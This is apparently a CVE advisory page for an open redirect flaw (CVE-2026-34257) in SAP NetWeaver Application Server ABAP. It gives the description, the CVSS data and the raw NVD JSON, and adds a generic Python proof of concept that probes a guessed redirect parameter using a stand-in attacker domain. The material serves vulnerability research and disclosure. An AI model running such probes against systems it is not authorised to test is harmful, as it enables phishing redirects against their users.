Security Vulnerability Report
CVE-2026-34257 CVSS 6.1 MEDIUM

CVE-2026-34257

Published: 2026-04-14 01:16:04
Last Modified: 2026-04-17 15:18:17

Description

Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to a page controlled by the attacker. This has a low impact on the confidentiality and integrity of the application and no impact on availability.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Application Server ABAP (for the specific affected versions, refer to SAP Security Note 3692004)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-34257
import requests


def check_open_redirect(target_url):
    # Malicious domain controlled by attacker
    malicious_site = "http://attacker-example.com"

    # Payload attempting to trigger the redirect
    # Note: The specific parameter name (e.g., 'url', 'redirect', 'target')
    # depends on the vulnerable endpoint
    payload = f"?redirect={malicious_site}"
    full_url = target_url + payload

    try:
        # Do not follow the redirect; inspect the server's own response
        response = requests.get(full_url, allow_redirects=False, timeout=5)

        # Check for redirect status codes and whether the Location header
        # points to the malicious site
        if response.status_code in [301, 302, 307, 308]:
            location = response.headers.get('Location', '')
            if malicious_site in location:
                print("[+] Vulnerability Confirmed!")
                print(f"    Target: {target_url}")
                print(f"    Redirecting to: {location}")
                return True

        print("[-] Not vulnerable or payload incorrect.")
        return False
    except Exception as e:
        # Network errors, timeouts, etc. are reported and treated as "not confirmed"
        print(f"Error: {e}")
        return False


if __name__ == "__main__":
    # Replace with actual vulnerable endpoint
    target = "http://vulnerable-sap-server.com/sap/bc/webdynpro_abap/..."
    check_open_redirect(target)

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34257",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T01:16:03.730",
    "lastModified": "2026-04-17T15:18:16.507",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3692004",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}